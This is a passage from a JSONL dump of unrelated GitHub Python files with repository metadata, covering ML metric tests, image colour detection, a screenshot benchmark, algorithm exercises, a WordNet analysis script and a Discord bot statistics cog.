\"sample_weight\": tf.constant([]),\n \"expected_result\": 0.0,\n },\n )\n def test_treatment_fraction_computes_weighted_mean_of_is_treatment_tensor(\n self, is_treatment, sample_weight, expected_result\n ):\n metric = treatment_fraction.TreatmentFraction()\n y_true = tf.zeros_like(is_treatment)\n y_pred = self._get_y_pred(is_treatment)\n metric.update_state(\n y_true=y_true, y_pred=y_pred, sample_weight=sample_weight\n )\n self.assertEqual(expected_result, metric.result())\n\n def test_multiple_update_batches_returns_aggregated_treatment_fractions(self):\n metric = treatment_fraction.TreatmentFraction()\n\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [True], [True]])),\n sample_weight=None,\n )\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[False], [False], [False]])),\n sample_weight=None,\n )\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [False], [True]])),\n sample_weight=tf.constant([0.3, 0.25, 0.7]),\n )\n\n expected_treatment_fraction = np.average(\n [1, 1, 1, 0, 0, 0, 1, 0, 1], weights=[1, 1, 1, 1, 1, 1, 0.3, 0.25, 0.7]\n )\n self.assertEqual(expected_treatment_fraction, metric.result())\n\n def test_initial_and_reset_state_return_zero_treatment_fraction(self):\n metric = treatment_fraction.TreatmentFraction()\n self.assertEqual(0.0, metric.result())\n\n metric(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [False], [True]])),\n )\n self.assertEqual(2 / 3, metric.result())\n\n metric.reset_states()\n self.assertEqual(0.0, metric.result())\n\n def test_metric_config_is_serializable(self):\n metric = treatment_fraction.TreatmentFraction(\n name=\"test_name\", dtype=tf.float16\n )\n y_pred = self._get_y_pred(\n is_treatment=tf.constant([[True], [False], [True], [False]]),\n )\n self.assertLayerConfigurable(\n layer=metric, y_true=tf.zeros(4), y_pred=y_pred, serializable=True\n )\n\n def test_invalid_prediction_tensor_type_raises_type_error(self):\n metric = treatment_fraction.TreatmentFraction()\n\n with self.assertRaisesRegex(\n TypeError, \"y_pred must be of type `TwoTowerTrainingOutputs`\"\n ):\n metric.update_state(y_true=tf.ones((3, 1)), y_pred=tf.ones((3, 1)))\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"MullTriX/Cat-Recognition","sub_path":"official/recommendation/uplift/metrics/treatment_fraction_test.py","file_name":"treatment_fraction_test.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18362062881","text":"import numpy as np\nimport cv2\n\n\nclass Rect(object):\n def __init__(self, x1, y1, x2, y2):\n super().__init__()\n self.x1 = int(x1)\n self.x2 = int(x2)\n self.y1 = int(y1)\n self.y2 = int(y2)\n \n def __repr__(self):\n return f\"x1 - {self.x1},\\\n y1 - {self.y1},\\\n x2 - {self.x2},\\\n y2 - {self.y2}\"\n\n\ndef hex_to_rgb(h: str):\n return tuple(int(h[i:i+2], 16) for i in (0, 2, 4))\n\n\ndef rgb_to_hex(rgb):\n return str.upper('%02x%02x%02x' % tuple(rgb))\n\n\nhex_color_map = {\n \"FFFDD0\": \"Кремовый\",\n \"000000\": \"Черный\",\n \"7B3F00\": \"Шоколадный\",\n \"BEBEBE\": \"Серый\",\n \"00BFFF\": \"Голубой\",\n \"91302B\": \"Рыжий\",\n \"FFFFFF\": \"Белый\"\n}\n\n\ncolors = np.array([hex_to_rgb(elem) for elem in hex_color_map.keys()])\n\n\ndef get_mask(img, rect: Rect):\n mask = np.zeros(img.shape[:2],np.uint8)\n bgdModel = np.zeros((1,65),np.float64)\n fgdModel = np.zeros((1,65),np.float64)\n r = (rect.x1, rect.y1, rect.x2 - rect.x1, rect.y2 - rect.y1) # format : x,y,w,h and only int numbers\n cv2.grabCut(img,mask,r,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_RECT)\n mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')\n return mask2\n\n\ndef closest_colour(requested_colour):\n min_colours = {}\n for color in colors:\n r_c, g_c, b_c = color\n rd = (r_c - requested_colour[0]) ** 2\n gd = (g_c - requested_colour[1]) ** 2\n bd = (b_c - requested_colour[2]) ** 2\n min_colours[(rd + gd + bd)] = color\n return hex_color_map[rgb_to_hex(min_colours[min(min_colours.keys())])]\n\n\ndef count_colors(img, mask):\n reduced_img = img*mask[:,:,np.newaxis]\n count = {}\n for p in reduced_img[mask!=0]:\n res = closest_colour(p)\n if not count.get(res):\n count[res] = 0\n count[res] += 1\n return count\n\n\ndef choose_color(colors_count: dict):\n res_colors = np.array(sorted(list(colors_count.items()), key=lambda item: item[-1]))\n top = res_colors[:, -1][-3:].astype(np.float32)\n norm = np.linalg.norm(top)\n if ((top / norm <= 0.64) & (top / norm >= 0.5)).all():\n return [\"Многоцвет\"]\n else:\n return res_colors[-2:, 0].tolist()\n\n\ndef pred_color(img: np.ndarray, boxes: np.ndarray):\n res = []\n for box in boxes:\n rect = Rect(*box[:4])\n mask = get_mask(img, rect)\n res.append(choose_color(count_colors(img, mask)))\n return res\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Makarov-Leonid/cat_breed_recognizer","sub_path":"app/colors_tools.py","file_name":"colors_tools.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13489246120","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport array\nfrom Xlib import display, X\nimport wx\nwx.App()\n\nfrom skimage.transform import resize\nfrom skimage.util import img_as_float\nfrom skimage.io._plugins.pil_plugin import (pil_to_ndarray, ndarray_to_pil, _palette_is_grayscale)\nimport skimage.io as sio\n\nimport numpy as np\n\nfrom PIL import Image\n\n\n# CONSTANTS #\nSRC_W = 640\nSRC_H = 480\nSRC_D = 3\nOFFSET_X = 400\nOFFSET_Y = 240\n\nIMG_W = 200\nIMG_H = 66\nIMG_D = 3\n\n\ndef original_take_screenshot():\n screen = wx.ScreenDC()\n size = screen.GetSize()\n bmp = wx.Bitmap(size[0], size[1])\n mem = wx.MemoryDC(bmp)\n mem.Blit(0, 0, size[0], size[1], screen, 0, 0)\n return bmp.GetSubBitmap(wx.Rect([0,0],[SRC_W,SRC_H]))\n\n\ndef modified_take_screenshot():\n screen = wx.ScreenDC()\n bmp = wx.Bitmap(SRC_W, SRC_H)\n mem = wx.MemoryDC(bmp)\n mem.Blit(0, 0, SRC_W, SRC_H, screen, OFFSET_X, OFFSET_Y)\n return bmp\n\ndef alternative_take_screenshot():\n dsp = display.Display()\n root = dsp.screen().root\n raw = root.get_image(0, 0, SRC_W, SRC_H, X.ZPixmap, 0xffffffff)\n image = Image.frombytes(\"RGB\", (SRC_W, SRC_H), raw.data, \"raw\", \"BGRX\")\n return image\n\n\ndef original_prepare_image(img):\n buf = img.ConvertToImage().GetData()\n img = np.frombuffer(buf, dtype='uint8')\n\n img = img.reshape(SRC_H, SRC_W, SRC_D)\n img = resize(img, [IMG_H, IMG_W])\n\n return img\n\n\narr = array.array('B', [0] * (SRC_W * SRC_H * SRC_D));\ndef modified_prepare_image(img):\n img.CopyToBuffer(arr)\n img = np.frombuffer(arr, dtype=np.uint8)\n\n img = img.reshape(SRC_H, SRC_W, SRC_D)\n\n im = Image.fromarray(img)\n im = im.resize((IMG_W, IMG_H))\n\n im_arr = np.frombuffer(im.tobytes(), dtype=np.uint8)\n im_arr = im_arr.reshape((IMG_H, IMG_W, IMG_D))\n\ndef alternative_prepare_image(image):\n if str(type(image)) == \"\":\n image = pil_to_ndarray(image)\n ndar = image.reshape(SRC_H, SRC_W, SRC_D)\n im = Image.fromarray(ndar)\n im = im.resize((IMG_W, IMG_H))\n im_arr = np.frombuffer(im.tobytes(), dtype=np.uint8) # in object exposing buffer interface out ndarray\n im_arr = im_arr.reshape((IMG_H, IMG_W, IMG_D)) # 200, 66, 3\n\n\n\ndef call_original():\n bmp = original_take_screenshot()\n vec = original_prepare_image(bmp)\n\n\ndef call_modified():\n bmp = modified_take_screenshot()\n vec = modified_prepare_image(bmp)\n\ndef call_alternative():\n bmp = alternative_take_screenshot()\n vec = alternative_prepare_image(bmp)\n\n\nif __name__ == '__main__':\n import timeit\n\n try:\n n = int(sys.argv[1])\n except (ValueError, IndexError) as e:\n n = 100\n\n print(\"# Running tests \" + str(n) + \" times\")\n\n # print(\"#\")\n # print(\"# ORIGINAL:\")\n # print(timeit.timeit(\"call_original()\", setup=\"from __main__ import call_original;\", number=n))\n\n # print(\"#\")\n # print(\"# MODIFIED:\")\n # print(timeit.timeit(\"call_modified()\", setup=\"from __main__ import call_modified;\", number=n))\n \n print(\"#\")\n print(\"# ALTERNATIVE:\")\n print(timeit.timeit(\"call_alternative()\", setup=\"from __main__ import call_alternative;\", number=n))\n\n######################################################\n# SOME RESULTS #\n#\n# Running tests 10000 times\n#\n# ORIGINAL:\n# 1210.20094013\n#\n# MODIFIED:\n# 313.987584114\n#\n#\n# Running tests 10000 times\n#\n# ORIGINAL:\n# 1074.97350001\n#\n# MODIFIED:\n# 270.604922056\n#\n\n# Running tests 10 times\n#\n# ALTERNATIVE:\n# 0.150660037994\n \n# Running tests 100 times\n#\n# ALTERNATIVE:\n# 1.30269503593\n\n# Running tests 200 times\n#\n# ALTERNATIVE:\n# 2.69465994835\n# Running tests 50 times\n#\n# ALTERNATIVE:\n# 0.64985203743\n# 150\n# 1.98458385468\n\n######################################################\n \n\n######################################################\n# RESULTS DURING ACTUAL UTILS.PY PREPARE RUN #\n#\n# Preparing 4493 samples (8 races)\n#\n# ORIGINAL CODE: ~280s\n#\n# MODIFIED CODE: ~90s\n#\n######################################################\n \n\n######################################################\n# RESULTS DURING ACTUAL PLAY.PY RUN #\n#\n# ORIGINAL CODE:\n# Screenshot Prepare Image Model Eval\n# Avg Times (500): 0.000318816661835 0.136291568279 0.0443236446381\n#\n# MODIFIED CODE:\n# Screenshot Prepare Image Model Eval\n# Avg Times (500): 0.000203844547272 0.0492500219345 0.0412494616508\n#\n# IMPROVEMENT (AS % DECREASE OVER ORIGINAL):\n# Screenshot Prepare Image Model Eval\n# 36.06% 63.86% 6.94% (execution variance - no changes)\n#\n######################################################\n\n\n","repo_name":"DistributedSystemsGroup/tensorkart","sub_path":"tests/perfTests.py","file_name":"perfTests.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1509387612","text":"from torch import Tensor\nfrom torch.autograd import Variable\nfrom torch.optim import Adam\nfrom misc import hard_update, gumbel_softmax, onehot_from_logits\nfrom policies import DiscretePolicy\n\n\nclass AttentionAgent(object):\n\n def __init__(self, num_in_pol, num_out_pol, hidden_dim=64,\n lr=0.01, onehot_dim=0):\n\n self.policy = DiscretePolicy(num_in_pol, num_out_pol,\n hidden_dim=hidden_dim,\n onehot_dim=onehot_dim)\n self.target_policy = DiscretePolicy(num_in_pol, num_out_pol,\n hidden_dim=hidden_dim,\n onehot_dim=onehot_dim)\n\n hard_update(self.target_policy, self.policy)\n self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)\n\n def step(self, obs, explore=False):\n\n return self.policy(obs, sample=explore)\n\n def get_params(self):\n return {'policy': self.policy.state_dict(),\n 'target_policy': self.target_policy.state_dict(),\n 'policy_optimizer': self.policy_optimizer.state_dict()}\n\n def load_params(self, params):\n self.policy.load_state_dict(params['policy'])\n self.target_policy.load_state_dict(params['target_policy'])\n self.policy_optimizer.load_state_dict(params['policy_optimizer'])\n\n","repo_name":"hyunrrr/maac_gfootball","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70982065497","text":"# Write a function is_member() that takes a value (i.e. a number, string, etc)\n# x and a list of values a, and\n# returns True if x is a member of a, False otherwise.\n# (Note that this is exactly what the in operator does,\n# but for the sake of the exercise you should pretend\n# Python did not have this operator.)\n\ndef is_member(z, list1):\n if z in list1:\n return True\n else:\n return False\n\n\nlist1 = [1, 2, 3, 4, 5, 6]\nprint(is_member(6, list1))\n\n\ndef member_val(checkVal, list2):\n for i in range(len(list2)):\n if checkVal == list2[i]:\n return True\n\n\nlist2 = [1, 2, 3, 4, 5, 6]\nprint(member_val(4, list2))\n\n\ndef mem_val(chek, list3):\n for i in range(0, list3):\n if list3.count(chek) > 0:\n return True\n\n\nlist3 = [1, 2, 3, 4, 5]\nchek = 3\nprint(member_val(chek, list3))\n","repo_name":"arpit0712-test/47_Hard_Python-problems","sub_path":"Q9/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9579382296","text":"\r\nfile1 = open('abc.txt','w')\r\nl = [\"The Sas service is unavailable \\n\",\"please wait untill the Service Restored !!! \\n\"]\r\nfile1.writelines(l)\r\n\r\nfile1.close()\r\n\r\nfile2 = open('xyz.txt','w')\r\nl = [\"This is the second file\\n\"]\r\nfile2.writelines(l)\r\n\r\nfile2.close()\r\n\r\ndef remove_lowercase(file1,file2):\r\n f1 = open(file1)\r\n txt1=f1.read()\r\n \r\n f2=open(file2,'w')\r\n sentences=txt1.split()\r\n for word in sentences:\r\n mixed = not word.islower() and not word.isupper()\r\n if mixed:\r\n f2.write(word)\r\n f2.write('\\n')\r\n\r\nremove_lowercase('abc.txt','xyz.txt')\r\nwith open ('xyz.txt','r+') as file:\r\n\r\n text = file.read()\r\n print(text)","repo_name":"udghosh/Practice","sub_path":"file_handling_5.py","file_name":"file_handling_5.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39686537486","text":"import random\n\n# Problem code\nclass Solution:\n def __init__(self, nums):\n self.table = {}\n for index, num in enumerate(nums):\n if num in self.table:\n self.table[num].append(index)\n else:\n self.table[num] = [index]\n\n def pick(self, target):\n array = self.table[target]\n return random.choice(array)\n\n# Setup\na = [7,1,5,7,6,4,7]\nobj = Solution(a)\nparam_1 = obj.pick(7)\nprint(\"Random 7 from array has index \" + str(param_1))\n","repo_name":"Voley/AlgorithmicProblemsV2","sub_path":"Arrays/index/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"11669514919","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('qa', '0013_auto_20150210_1002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Voter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('answer', models.ForeignKey(to='qa.Answer')),\n ('user', models.ForeignKey(to='qa.UserProfile')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='answer',\n name='votes',\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='picture',\n field=models.ImageField(upload_to=b'profile_images', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"softdevelop/PurNet","sub_path":"Djangoproj/PurNet/qa/migrations/0014_auto_20150212_0636.py","file_name":"0014_auto_20150212_0636.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39581880282","text":"\nfrom itertools import zip_longest\nimport sys\nfrom typing import List\nimport pytest\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = self.right = None\n self.cnt = 1\n self.size = 1\n\n def __repr__(self):\n left = repr(self.left).split('\\n') if self.left else ['']\n right = repr(self.right).split('\\n') if self.right else ['']\n if not left and not right:\n return str(self.val)\n else:\n lines = [' ' * len(left[0]) + str(self.val)]\n for l, r in zip_longest(left, right):\n lines.append(f'{l or \"\"} {r or \"\"}')\n return '\\n'.join(lines)\n\n\nclass SegmentTree:\n def __init__(self):\n self.root = None\n\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n return\n node = self.root\n while node is not None:\n node.size += 1\n if val < node.val:\n if not node.left:\n node.left = Node(val)\n break\n else:\n node = node.left\n elif val > node.val:\n if not node.right:\n node.right = Node(val)\n break\n else:\n node = node.right\n else:\n node.cnt += 1\n return\n\n def cnt_smaller(self, val, include_equals=False):\n if not self.root:\n return 0\n ret = 0\n node = self.root\n while node:\n if val < node.val:\n node = node.left\n elif val > node.val:\n ret += node.size\n node = node.right\n ret -= node.size if node else 0\n else:\n ret += node.left.size if node.left else 0\n if include_equals:\n return ret + node.cnt\n else:\n return ret\n return ret\n\n def __repr__(self):\n return repr(self.root)\n\n\nclass Solution:\n def countRangeSum(self, nums: List[int], lower: int, upper: int) -> int:\n if not nums:\n return 0\n tree = SegmentTree()\n tree.insert(0)\n ret = 0\n s = 0\n for n in nums:\n s += n\n # lower <= s - x <= upper\n # s - upper <= x <= s - lower\n i = tree.cnt_smaller(s - upper)\n j = tree.cnt_smaller(s - lower, include_equals=True)\n tree.insert(s)\n ret += j-i\n return ret\n\n\n@pytest.mark.parametrize('nums, lower, upper, expected', [\n ([-2,5,-1], -2, 2, 3),\n ([0,-3,-3,1,1,2], 3, 5, 2),\n])\ndef test(nums, lower, upper, expected):\n assert expected == Solution().countRangeSum(nums, lower, upper)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main([\"-s\", \"-v\"] + sys.argv))\n","repo_name":"sungminoh/algorithms","sub_path":"leetcode/solved/327_Count_of_Range_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7953990078","text":"#!/usr/bin/env python3\n\nimport WNQuery\nimport os\nimport pickle\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport math\n\nnullout = open(os.devnull, \"w\")\n\ndef make_synonym_string(synset):\n return \",\".join([syn.literal for syn in synset.synonyms])\n\n\n\n\nwn = WNQuery.WNQuery(\"./plwordnet-3.1-visdisc.xml\", nullout)\n\ndef synset_from_wnid(wnid):\n return next((wn.lookUpID(wnid, i) for i in [\"n\", \"v\", \"a\", \"b\"]), None)\n\ndef synset_from_literal_and_sense(literal, sense):\n return next((wn.lookUpSense(literal, sense, i) for i in [\"n\", \"v\", \"a\", \"b\"]), None)\n\ndef my_lea_cho(wnid_from, wnid_to):\n D = 20\n already_visited = set()\n def make_step(to_visit):\n new_to_visit = set()\n for wnid_to_visit in to_visit:\n synset = synset_from_wnid(wnid_to_visit)\n if synset:\n for wnid, relation in synset.ilrs:\n if wnid == wnid_to:\n return 1\n if wnid not in already_visited:\n new_to_visit.add(wnid)\n already_visited.add(wnid)\n return 1 + make_step(new_to_visit)\n \n return - math.log(make_step(set([wnid_from])) / D)\n\ndef my_lea_cho_fixed(wnid_from, wnid_to):\n wnids = [wnid_from, wnid_to]\n def find_with_relations(wnid, relation_str):\n synset = synset_from_wnid(wnid)\n if synset:\n result = []\n for wnid, relation in synset.ilrs:\n if relation == relation_str:\n result.append(wnid)\n return result\n else:\n return []\n\n def find_hypernyms(wnid):\n return find_with_relations(wnid, \"hypernym\")\n\n def find_hyponyms(wnid):\n return find_with_relations(wnid, \"hyponym\")\n\n hypernyms = []\n\n def max_taxonomy_depth(wnid):\n hyponyms = find_hyponyms(wnid)\n if hyponyms:\n return 1 + max(max_taxonomy_depth(wn) for wn in hyponyms)\n else:\n return 0;\n\n for i, wnid in enumerate(wnids):\n tree = [[wnid]]\n\n\n def is_in_tree(wn):\n for level in tree:\n for wn_ in level:\n if wn_ == wn:\n return True\n return False\n\n while(True):\n to_insert = []\n for last_wnid in tree[-1]:\n hyps = find_hypernyms(last_wnid)\n for hyp in hyps:\n if not is_in_tree(hyp):\n to_insert.append(hyp)\n if to_insert:\n tree.append(to_insert);\n else:\n break\n\n hypernyms.append(tree)\n\n \n connections = []\n\n for level_a, list_a in enumerate(hypernyms[0]):\n for wnid_a in list_a:\n for level_b, list_b in enumerate(hypernyms[1]):\n for wnid_b in list_b:\n if wnid_a == wnid_b:\n connections.append([wnid_a, level_a + level_b])\n\n taxonomy_depths = []\n for tree in hypernyms:\n for root in tree[-1]:\n taxonomy_depths.append(max_taxonomy_depth(root))\n\n D = max(taxonomy_depths)\n\n if connections:\n min_closest = min(connections, key=lambda x: x[1])[1]\n else:\n min_closest = max(len(hypernyms[0]), len(hypernyms[1]))\n D += 1\n\n return - math.log(min_closest / (2 * D))\n \n \n \n\nprint(\"Zad 3. \\\"szkoda\\\":\")\n\nszkodaLookup = wn.lookUpLiteral(\"szkoda\", \"n\")\n\n\nfor result in szkodaLookup:\n print()\n print(\"Znaczenie: {}\".format(result.definition))\n print(\"Synonimy: {}\".format(\", \".join([syn.literal for syn in result.synonyms])))\n\n\nprint(\"Zad 4. \\\"wypadek drogowy\\\":\\n\")\n\nwypadekLookup = wn.lookUpLiteral(\"wypadek drogowy\", \"n\")\n\nif wypadekLookup:\n result = wypadekLookup[0]\n\n first = wn.lookUpRelation(result.wnid, \"n\", \"hypernym\")\n\n edge_labels = {}\n node_labels = {}\n\n G = nx.DiGraph()\n \n def find_hypernyms(wnid):\n G.add_node(wnid)\n synset = synset_from_wnid(wnid)\n\n node_labels[synset.wnid] = synset.wnid + \"\\n\\n\" + make_synonym_string(synset)\n rel_res = wn.lookUpRelation(synset.wnid, synset.pos, \"hypernym\")\n for new_wnid in rel_res:\n G.add_edge(wnid, new_wnid)\n edge_labels[(synset.wnid, new_wnid)] = \"hyperonimia\"\n find_hypernyms(new_wnid)\n \n find_hypernyms(result.wnid)\n\n plt.figure()\n\n lay = nx.layout.circular_layout(G)\n\n nx.draw_networkx_nodes(G, lay, alpha=0.0)\n nx.draw_networkx_edges(G, lay)\n nx.draw_networkx_labels(G, lay, node_labels, font_size=6)\n nx.draw_networkx_edge_labels(G, lay, edge_labels, font_size=6)\n\n ax = plt.gca()\n ax.set_axis_off()\n\n plt.savefig(\"zad4.png\")\n\n print(\"![](zad4.png)\")\n\nprint(\"Zad 5. wypadek:1\\n\")\n\nrightWypadek = wn.lookUpSense(\"wypadek\", 1, \"n\")\n\nif rightWypadek:\n\n firstHyponyms = wn.lookUpRelation(rightWypadek.wnid, \"n\", \"hyponym\")\n\n print(\"Hiponimie 1 rzędu:\\n\")\n\n for hypo_wnid in firstHyponyms:\n print(\"{}: {}\".format(hypo_wnid,make_synonym_string(synset_from_wnid(hypo_wnid))))\n\n print(\"\\nZad 6. cd wypadek:1\\n\")\n\n print(\"Hiponimie 2 rzędu:\\n\")\n\n for hypo_wnid1 in firstHyponyms:\n for hypo_wnid2 in wn.lookUpRelation(hypo_wnid1, \"n\", \"hyponym\"):\n print(\"{}: {}\".format(hypo_wnid2,make_synonym_string(synset_from_wnid(hypo_wnid2))))\n\nprint(\"\\nZad 7.\\n\")\n\nwords_list = [[(\"szkoda\",2), (\"strata\",1), (\"uszczerbek\",1), (\"szkoda majątkowa\",1),(\"uszczerbek na zdrowiu\",1), (\"krzywda\",1), (\"niesprawiedliwość\",1), (\"nieszczęście\",2)],[(\"wypadek\",1), (\"wypadek komunikacyjny\",1), (\"kolizja\",2), (\"zderzenie\",2), (\"kolizja drogowa\",1), (\"katastrofa budowlana\",1), (\"wypadek drogowy\",1)]]\n\nfor i, words in enumerate(words_list):\n plt.figure()\n G = nx.MultiDiGraph()\n\n node_labels = {}\n edge_labels = {}\n\n for word, sense in words:\n synset = synset_from_literal_and_sense(word, sense)\n if not synset:\n print(\"{}:{}\".format(word, sense))\n \n G.add_node(synset.wnid)\n node_labels[synset.wnid] = \"{}:{}\".format(word, sense)\n \n for word, sense in words:\n synset = synset_from_literal_and_sense(word, sense)\n for wnid, relation in synset.ilrs:\n if wnid in node_labels:\n G.add_edge(synset.wnid, wnid)\n edge_labels[(synset.wnid, wnid)] = relation\n\n lay = nx.layout.circular_layout(G)\n\n nx.draw_networkx_nodes(G, lay, alpha=0.0)\n nx.draw_networkx_edges(G, lay)\n nx.draw_networkx_labels(G, lay, node_labels, font_size=6)\n nx.draw_networkx_edge_labels(G, lay, edge_labels, font_size=6, label_pos=0.3)\n\n ax = plt.gca()\n ax.set_axis_off()\n\n plt.savefig(\"zad7_{}.png\".format(i+1))\n\n print(\"![](zad7_{}.png)\".format(i+1))\n\nprint(\"Brakowało słowa \\\"bezkolizyjny\\\" w SłowoSieci.\")\n\nprint(\"\\nZad 8.\\n\")\n\nto_calc = [((\"szkoda\",2),(\"wypadek\",1)),((\"kolizja\",2),(\"szkoda majątkowa\",1)),((\"nieszczęście\",2),(\"katastrofa budowlana\",1))]\n\nfor word1, word2 in to_calc:\n syn1 = synset_from_literal_and_sense(word1[0], word1[1])\n syn2 = synset_from_literal_and_sense(word2[0], word2[1])\n \n value1 = wn.simLeaCho(syn1.wnid, syn2.wnid, \"n\", \"hypernym\", True)\n\n value2 = my_lea_cho_fixed(syn1.wnid, syn2.wnid)\n\n #my_lea_cho_fixed(syn1.wnid, syn2.wnid)\n\n print(\"WNQuery.simLeaCho({},{})={:.3f}\".format(word1[0], word2[0], value1))\n\n print(\"my_lea_cho_fixed({},{})={:.3f}\".format(word1[0], word2[0], value2))\n","repo_name":"m-karcz/PJN","sub_path":"7-wordnet/pywnxml/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70697296537","text":"#!/usr/bin/python3\n\"\"\"\nTask 0: minimum operations\n\"\"\"\n\n\"\"\"\ndef minOperations(n):\n a method that calculates the fewest number\n of operations needed to result in exactly\n n H characters in the file\n\n if type(n) != int or n <= 0:\n return 0\n hCf = h_c_f(n)\n max_op = n // hCf\n while hCf != 1:\n x = h_c_f(hCf)\n max_op += hCf // x\n hCf = x\n return max_op\n\n\ndef h_c_f(val):\n\n calculates the highest common factor\n\n if val <= 3:\n return 1\n fac = 1\n for i in range(2, (val // 2) + 1):\n if (val % i) == 0:\n fac = i\n return fac\n\"\"\"\n\n\ndef minOperations(n):\n '''Computes the fewest number of operations needed to result\n in exactly n H characters.\n '''\n if not isinstance(n, int):\n return 0\n ops_count = 0\n clipboard = 0\n done = 1\n # print('H', end='')\n while done < n:\n if clipboard == 0:\n # init (the first copy all and paste)\n clipboard = done\n done += clipboard\n ops_count += 2\n # print('-(11)->{}'.format('H' * done), end='')\n elif n - done > 0 and (n - done) % done == 0:\n # copy all and paste\n clipboard = done\n done += clipboard\n ops_count += 2\n # print('-(11)->{}'.format('H' * done), end='')\n elif clipboard > 0:\n # paste\n done += clipboard\n ops_count += 1\n # print('-(01)->{}'.format('H' * done), end='')\n # print('')\n return ops_count\n","repo_name":"Senseiuc/alx-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1063173098","text":"import ast\nimport astunparse\nf = open('/home/daniel/Documents/College/Semester7/Research/type-analyzer/allrepo/original/(5j9)wikitextparser*tests*test_config.pyi')\n\nclass Analyzer(ast.NodeVisitor):\n def visit_FunctionDef(self, node):\n for arg in node.args.args:\n if arg.annotation != None:\n q = astunparse.unparse(arg.annotation)\n print(q)\n\na = Analyzer()\na.visit(ast.parse(f.read()))","repo_name":"proganalysis/repository-statistics","sub_path":"tools/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33097748328","text":"class Solution(object):\n def complexNumberMultiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n num1_real, num1_imaginary = map(int, num1[:-1].split('+'))\n\n num2_real, num2_imaginary = map(int, num2[:-1].split('+'))\n\n num_real = (num1_real * num2_real) - (num1_imaginary * num2_imaginary)\n num_imaginary = (num1_real * num2_imaginary) + (num2_real * num1_imaginary) \n\n rs = \"{}+{}i\".format(num_real, num_imaginary)\n\n return rs\n","repo_name":"ngocvtd/leetcode","sub_path":"537.ComplexNumberMultiplication.py","file_name":"537.ComplexNumberMultiplication.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38770778102","text":"from contextlib import suppress\nimport asyncio\nimport os\n\nfrom discord.ext import commands, tasks\nfrom influxdb_client import InfluxDBClient, Point\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nimport psutil\n\n\nclass Influx(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n auth = self.bot.auth[\"InfluxDB\"]\n self.client = InfluxDBClient(\n url=auth[\"url\"],\n token=auth[\"token\"],\n org=auth[\"org\"]\n )\n self.write_api = self.client.write_api(write_options=SYNCHRONOUS)\n self.last = {\n \"users\": len(bot.users),\n \"guilds\": len(bot.guilds)\n }\n self.process = psutil.Process(os.getpid())\n self.messages = 0\n self.update_user_count.start()\n self.update_stats.start()\n\n def cog_unload(self):\n self.update_user_count.cancel()\n self.update_stats.cancel()\n\n def start_thread(self, pointer):\n with suppress(Exception):\n layer = lambda: self.write_api.write(\"542f070eec1976be\", record=pointer)\n return self.bot.loop.run_in_executor(None, layer)\n\n @tasks.loop(seconds=60)\n async def update_user_count(self):\n if not self.bot.is_ready():\n return\n with suppress(Exception):\n async def user_count():\n count = 0\n for guild in list(self.bot.guilds):\n await 